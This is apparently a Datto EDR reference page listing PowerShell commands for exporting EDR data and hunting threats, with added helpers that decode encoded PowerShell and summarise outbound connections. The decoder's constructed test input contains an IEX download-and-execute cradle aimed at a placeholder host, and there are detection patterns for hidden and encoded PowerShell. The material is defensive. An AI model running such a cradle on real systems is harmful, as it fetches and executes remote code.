PowerShell Command List

Environment

  • Datto EDR

Description

Commands

Each entry below is listed as: Data Type, then Command, then Description.

Agents

Stop-Service -Name HUNTAgent; Start-Sleep -Seconds 5; Start-Service -Name HUNTAgent

Restart the Datto Endpoint Security Agent

Agents

Get-ICAgent -NoLimit | export-csv <MYCSVFILE>.csv -notypeinformation -noclobber

Export list of ALL Agents

Alerts

Get-ICAlert -NoLimit -where @{Threat="bad"} | Export-Csv <TEST>.csv -notypeinformation -noclobber

Gets all alerts whose threat rating is "bad" and exports them to a CSV

Analyze

Set-ICBox -id <8d908c82-6f96-4064-aa89-534f47da321a>
Get-ICObject -type Host -where @{failed=$false} -nolimit | Export-Csv <mycsv>.csv -notypeinformation -noclobber

Exports a CSV of all hosts that were scanned successfully. Set the box ID first to match the view you want (e.g. Global last 7, 30 or 90 days); Get-ICObject returns results for the currently selected box only.

Analyze

Get-ICAPI -endpoint hostscans -where @{failed=$false} | measure

Counts successful host scans (change the filter to @{failed=$true} to count failed scans; drop the trailing | measure to list the scans instead of counting them)

Analyze

Get-ICObject -type file -nolimit -allinstances -where @{"localBlacklist" = "True"} | Export-Csv <ENTERFILEPATH/FILENAME>.csv -noclobber

Gets all file objects that have been flagged/blacklisted locally, one row per host instance. Set the box with Set-ICBox first.

Applications

Get-ICObject -type Application -NoLimit | export-csv <FILENAME>.csv -notypeinformation -noclobber

Export list of ALL Applications from Analyze Tab

Artifacts

get-icapi -endpoint artifactdetails -nolimit | export-csv <ENTERFILEPATH/FILENAME>.csv -notypeinformation -noclobber

Exports a CSV of All Artifacts

Extension

Import-ICOfficialExtensions -update

Update and Import OFFICIAL extensions from our GitHub repository

Extension

Get-ICObject -type extension -nolimit -allinstances -where @{"name" = "<extension name>"} |Export-Csv <full path and filename.csv> -noclobber

Get Extension results with Details

Hash

Get-FileHash <filepath> -Algorithm MD5

Get MD5 Hash for a file

Hash

Get-FileHash <filepath> -Algorithm SHA256

Get SHA256 Hash for a file

Hash

Get-ICFileDetail -sha1 <b09510797878c54a0c4b163d7d6201cc34065ae0>

Gets file reputation data for a specific SHA1 hash (AV results, whether the file is signed, etc.). Note that this lookup is keyed on SHA1, not the MD5 or SHA256 shown above; Get-FileHash with -Algorithm SHA1 produces the value to pass in.

Host

Get-ICAddress -NoLimit | Export-Csv FILENAME.csv -notypeinformation -noclobber

Exports a CSV of all hosts (addresses) from the Discover tab

Host

get-icaddress -TargetGroupId <39d4e412-6567-4da2-875e-4991796a5acf> -nolimit | export-csv C:\<pathname\filename>.csv

Gets all host data for a specific target group

Hosts

Get-ICObject -type Host -where @{failed=$false} -nolimit | Export-CSV <FILENAME>.csv -notypeinformation -noclobber

Gets all hosts where scans succeeded

Object

Get-ICObject -Type Connection -where @{remotePort=3389}

Gets all connections whose remote port is 3389, i.e. outbound RDP connections from the scanned hosts (inbound RDP sessions would show 3389 as the local port instead)

Target Group

Set-ICBox -id $((Get-ICBox -targetGroupId $((Get-ICTargetGroup -where @{name="TARGETGROUPNAME"}).id) -Last90).id) -Verbose
Get-ICAPI -endpoint boxArtifactDetails -where @{boxId=$ICCurrentBox} | Export-Csv <ENTERFILEPATH/FILENAME>.csv -notypeinformation -noclobber

Target group specific CSV download: sets the box to the named target group's last-90-day view, then exports that box's artifact details. $ICCurrentBox holds the box ID selected by Set-ICBox.

Target Group

Get-ICTargetGroup -where @{"name" = "<target group name>"}

Retrieves a specific Target Group based off of the where clause

Target Group

(Get-ICAddress -NoLimit).targetId | Sort-Object -Unique

Gets all unique target group IDs within the instance (-NoLimit is needed, otherwise only the default page of addresses is examined)

Target Group

Get-ICTargetGroup -nolimit |Export-Csv C:\<File Path\FileName>.csv -noclobber

Report of all target groups extracted as CSV.

Timeframe

Set-ICBox -id $((Get-ICBox -global -Last90).id)

Sets the timeframe (box) that the Analyze commands operate on, here the global last-90-day view

Analyze

Get-ICObject -Type Process -AllInstances -where @{ name = "powershell.exe"; commandLine = @{ regexp = "-" }} -fields hostname, name, path, commandLine, scannedOn | Sort-Object commandLine | Where-Object { $_.commandLine -match "-enc|hidden" } | Select-Object hostname, commandLine

Finds PowerShell processes launched with a command-line switch, then keeps those using -enc (encoded command) or hidden (window style), the switches most often seen in malicious PowerShell launches. Used when hunting for PowerShell abuse. Note that the -match only catches the spelled-out forms; short forms such as -e or -ec slip past it, so widen the pattern if you want them too.
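The entry above surfaces encoded PowerShell launches, but an analyst still has to decode the base64 blob to see what ran. The following is an added example, not part of the Datto EDR documentation or the Hunt module: a pipeline function that accepts process records shaped like Get-ICObject -Type Process output (hostname and commandLine fields), recognises -EncodedCommand and its short forms, decodes the UTF-16LE payload, and flags hidden-window launches. The sample records are constructed here so the block runs without a Datto EDR session.

```powershell
# Added example (not from the Datto EDR docs). Input objects are constructed
# below; in practice pipe Get-ICObject -Type Process output into the function.

function Expand-EncodedPowerShell {
    param(
        [Parameter(Mandatory, ValueFromPipeline)]$ProcessRecord
    )
    process {
        $cmd = [string]$ProcessRecord.commandLine

        # powershell.exe accepts any unambiguous prefix of -EncodedCommand, so
        # -e, -ec, -en, -enc ... all carry a payload. -ep / -ex (ExecutionPolicy)
        # do not match because the letter after "e" must be c, n..., or a space.
        $m = [regex]::Match($cmd, '(?i)(?:^|\s)[-/]e(?:c|n[a-z]*)?\s+["'']?([A-Za-z0-9+/=]+)')

        # -w hidden / -WindowStyle Hidden
        $hidden = $cmd -match '(?i)[-/]w(?:indowstyle)?\s+hidden'

        $decoded = $null
        if ($m.Success) {
            try {
                $bytes   = [Convert]::FromBase64String($m.Groups[1].Value)
                $decoded = [Text.Encoding]::Unicode.GetString($bytes)   # payload is UTF-16LE
            } catch {
                # keep the record: a broken blob is itself worth a look
                $decoded = "<invalid base64: $($_.Exception.Message)>"
            }
        }

        [pscustomobject]@{
            hostname       = $ProcessRecord.hostname
            encoded        = $m.Success
            hiddenWindow   = $hidden
            decodedCommand = $decoded
            commandLine    = $cmd
        }
    }
}

# Constructed sample records; the payload is built here, not captured anywhere.
$payload = 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/a.ps1")'
$b64     = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
$sample  = @(
    [pscustomobject]@{ hostname = 'WS01'; commandLine = "powershell.exe -nop -w hidden -enc $b64" },
    [pscustomobject]@{ hostname = 'WS02'; commandLine = 'powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1' },
    [pscustomobject]@{ hostname = 'WS03'; commandLine = 'powershell.exe -e not_base64!' }
)

# WS01 decodes to the IEX download cradle, WS02 drops out, WS03 is kept with an error note.
$sample | Expand-EncodedPowerShell | Where-Object { $_.encoded -or $_.hiddenWindow } | Format-List

# Against live data (same query as the entry above, minus the -match so the
# short forms are not missed):
# Get-ICObject -Type Process -AllInstances -where @{ name = "powershell.exe"; commandLine = @{ regexp = "-" }} -fields hostname, name, path, commandLine, scannedOn |
#     Expand-EncodedPowerShell | Where-Object { $_.encoded -or $_.hiddenWindow }
```

The decoded command is what to pivot on: a download cradle or a remote host name in it is a far stronger lead than the presence of -enc alone, which plenty of legitimate management tooling also uses.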

Analyze

Get-ICObject -Type Autostart -AllInstances -fields hostname, autostartType, regPath, value, path, scannedOn | Sort-Object value -Unique | Format-List hostname, autostartType, path, value

Retrieves all autostarts, one entry per unique value, showing hostname, autostartType, path and value. Used when hunting for persistence via autostarts.

Analyze

Get-ICObject -Type Autostart -AllInstances -fields hostname, autostartType, regPath, value, path, scannedOn -where @{ path = @{ regexp = "users" }; autostartType = "Run Key"; value = @{ regexp = "-" } } | Sort-Object value -Unique

Gets all autostarts but filters on Run Keys whose path is under a Users folder and whose value contains a command-line switch (-). The three conditions are separate keys of the -where hashtable; nesting autostartType and value inside the path filter (as an earlier version of this command did) silently returns no rows.

Analyze

$where = @{
    and = @(
        @{ processName = @{ regexp = "^((?!infocyte).)*$"}},
        @{ processId = @{neq = $null}},
        @{ remoteAddrString = @{ neq="127.0.0.1"}},
        @{ remoteAddrString = @{ neq="0.0.0.0"}},
        @{ remotePortString = @{ regexp = "^21$|^22$|^80$|^443$|^135$|^139$|^445$|^3389$|^8080$" }}
    )
}
Get-ICObject -Type Connection -AllInstances -where $where -fields hostname, processId, proto, localAddr, localPort, processPath, processName, remoteAddr, remotePort, state

Lists outbound, non-loopback connections to remote ports 21, 22, 80, 443, 135, 139, 445, 3389 and 8080 that have an owning process. The processName regexp excludes the Infocyte/Datto agent's own traffic; remove that clause if you want to see it.

Analyze

$where = @{
and = @(
@{ processName = "powershell.exe"},
@{ processId = @{neq = $null}}
)
}
Get-ICObject -Type Connection -AllInstances -where $where -fields hostname, processId, proto, localAddr, localPort, processPath, processName, remoteAddr, remotePort, state

Lists connections associated with PowerShell
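The two connection hunts above hard-code a port list and rely on the box having been set beforehand. The following is an added example, not part of the Datto EDR documentation or the Hunt module: a function that combines the target-group scoping from the Target Group entry (Get-ICTargetGroup, Get-ICBox, Set-ICBox) with the port-based connection hunt, exports the rows to CSV and returns a process/port summary for triage. It assumes the Hunt module is loaded and authenticated and uses only the cmdlets, parameters and -where operators (and, neq, regexp) shown on this page; the function name and parameters are this example's own.

```powershell
# Added example (not from the Datto EDR docs). Needs a live Datto EDR Hunt session.

function Export-ICOutboundConnectionHunt {
    param(
        [Parameter(Mandatory)][string]$TargetGroupName,
        [Parameter(Mandatory)][string]$OutFile,
        # default port list matches the hunt entry on this page
        [int[]]$Ports = @(21, 22, 80, 443, 135, 139, 445, 3389, 8080),
        # process-name substrings to drop, e.g. the agent's own traffic
        [string[]]$ExcludeProcessPattern = @('infocyte')
    )

    # Scope to the target group's last-90-day box, as the Target Group entry does.
    $tg = Get-ICTargetGroup -where @{ name = $TargetGroupName }
    if (-not $tg) { throw "Target group '$TargetGroupName' not found" }
    $box = Get-ICBox -targetGroupId $tg.id -Last90
    if (-not $box) { throw "No last-90-day box for target group '$TargetGroupName'" }
    Set-ICBox -id $box.id

    # Build "^21$|^22$|..." from the port list so callers can narrow the hunt.
    $portRegex    = ($Ports | ForEach-Object { "^$_`$" }) -join '|'
    $excludeRegex = "^((?!$($ExcludeProcessPattern -join '|')).)*`$"

    $where = @{
        and = @(
            @{ processName      = @{ regexp = $excludeRegex } },
            @{ processId        = @{ neq = $null } },
            @{ remoteAddrString = @{ neq = '127.0.0.1' } },
            @{ remoteAddrString = @{ neq = '0.0.0.0' } },
            @{ remotePortString = @{ regexp = $portRegex } }
        )
    }

    $rows = Get-ICObject -Type Connection -AllInstances -where $where -fields hostname, processId, proto, localAddr, localPort, processPath, processName, remoteAddr, remotePort, state
    $rows | Export-Csv -LiteralPath $OutFile -NoTypeInformation -NoClobber

    # Triage summary: which process talked to which remote port, most frequent first.
    $rows | Group-Object processName, remotePort |
        Sort-Object Count -Descending |
        Select-Object Count, Name
}

# Usage (box, CSV and summary for one group, narrowed to RDP, SMB and SSH):
# Export-ICOutboundConnectionHunt -TargetGroupName 'Finance Workstations' -OutFile 'C:\hunts\finance-outbound.csv' -Ports 3389, 445, 22
```

Reading the summary top-down works well in practice: expected pairs (a browser on 443, the agent on 443) are ignorable in bulk, while an office application or script host reaching 445 or 3389 on a handful of hosts is what the CSV is then opened for.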

Please refer to our Datto EDR Hunt API PowerShell Module Guide article if you need help getting started.